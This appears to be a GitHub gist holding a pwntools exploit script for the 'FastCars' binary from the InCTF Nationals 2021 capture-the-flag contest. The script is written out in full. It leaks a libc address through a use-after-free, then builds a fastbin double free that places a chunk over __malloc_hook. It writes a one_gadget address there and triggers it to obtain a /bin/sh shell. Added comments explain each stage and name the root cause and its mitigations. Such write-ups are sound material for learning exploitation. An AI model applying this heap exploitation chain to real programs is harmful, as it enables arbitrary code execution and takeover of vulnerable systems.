@k1R4

k1R4/exploit.py Secret

Created December 19, 2021 06:53
FastCars - InCTF Nationals 2021
from pwn import *
# Target binary and the libc it is linked against; both are ELF objects so
# that symbols (e.g. __malloc_hook) can be resolved once libc.address is set.
context.binary = elf = ELF("./FastCars")
libc = ELF("./libc-2.23.so")
context.log_level = "debug"  # echo every byte exchanged with the target
p = process("./FastCars")
# Allocation sizes the program's menu offers; a size's position in this list
# is the number sent as the menu choice (see alloc()).
size2make = [0x0, 0x18, 0x68, 0x1f8]
def alloc(size, data):
    """Drive menu option 1 (allocate) and return the slot index printed back.

    Args:
        size: one of the values in the module-level ``size2make`` list; its
            position in that list is what the program expects as the size
            choice. Any other value makes ``list.index`` raise ValueError,
            after the option "1" has already been sent.
        data: contents written into the new allocation.

    Returns:
        The slot index as an int. Only one byte is read back, so indices
        above 9 would be truncated to their first digit.
    """
    p.sendlineafter("> ", "1")
    menu_choice = size2make.index(size)
    p.sendlineafter("> ", str(menu_choice))
    p.sendlineafter("Car: ", data)
    p.recvuntil("Index: ")
    slot = p.recv(1)
    return int(slot)
def free(index):
    """Drive menu option 2 (free) for slot ``index``.

    Returns None; the program's own confirmation output is not consumed here,
    the next ``sendlineafter`` in the caller skips past it.
    """
    send = p.sendlineafter
    send("> ", "2")
    send("Index: ", str(index))
def leak(index):
    """Drive menu option 3 (show) for slot ``index`` and stop at the model bytes.

    The stream is advanced up to and including the "Model:" line and the
    single space that follows it, so the caller can ``p.recv`` the raw bytes
    of the slot's contents directly. Returns None.
    """
    send = p.sendlineafter
    send("> ", "3")
    send("Index: ", str(index))
    p.recvuntil("Model:\n ")
# Leak libc using uaf
# Stage 1: the program still shows a slot after it has been freed (the
# use-after-free the rest of the script relies on). The bytes read back are
# presumably a libc pointer left in the freed chunk's header area.
a = alloc(0x1f8,"AAA")
b = alloc(0x18,"X")  # NOTE(review): purpose not stated; presumably a spacer after `a` - confirm
free(a)
leak(a)
# 6 bytes of the leaked pointer, zero-extended to 48 bits. 0x3c4b78 is that
# pointer's distance from the libc base in this exact libc-2.23 build; the
# constant is meaningless for any other libc.
libc.address = unpack(p.recv(6),48) - 0x3c4b78
log.info("Libc -> "+hex(libc.address))
# fake chunk located above __malloc_hook to write it with one_gadget
# Stage 2: target address. The fake chunk starts 0x23 bytes before
# __malloc_hook so that a write into it reaches the hook (see `i` below).
fake_chunk = libc.symbols["__malloc_hook"]-0x23
log.info("Fake Chunk -> "+hex(fake_chunk))
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
# Gadget offset is tied to libc-2.23.so; it must be recomputed for any other build.
one_gadget = libc.address + 0xf1247
log.info("one_gadget -> "+hex(one_gadget))
# setup chunks for double free and fastbin attack
c = alloc(0x68,"")
d = alloc(0x68,"")
e = alloc(0x18,"")  # NOTE(review): not used again; presumably a spacer - confirm
# double free, avoid detection by freeing a chunk of same size in between
# glibc 2.23's fastbin double-free check only compares against the current
# bin head, which is why free(d) is interleaved. The root cause is that the
# program keeps the slot pointer after free; clearing it on free (or a libc
# with the tcache "key" check, 2.29+) would stop this sequence.
free(c)
free(d)
free(c)
# overwrite fd in double freed chunk to point to fake_chunk
f = alloc(0x68,p64(fake_chunk))
g = alloc(0x68,"")  # presumably returns d
h = alloc(0x68,"")  # presumably returns c a second time
# This allocation is presumably served from fake_chunk: 0x13 bytes of padding
# put one_gadget at __malloc_hook, the trailing zeros are for the gadget's
# [rsp+0x70] == NULL constraint as the author notes.
i = alloc(0x68,"X"*0x13+p64(one_gadget)+"\x00"*0x48) # put null bytes on stack to satisfy one_gadget
# trigger one_gadget
# Any further malloc goes through __malloc_hook; option 1 with size choice 1
# is the minimal request to cause one.
p.sendlineafter("> ", "1")
p.sendlineafter("> ", "1")
p.interactive()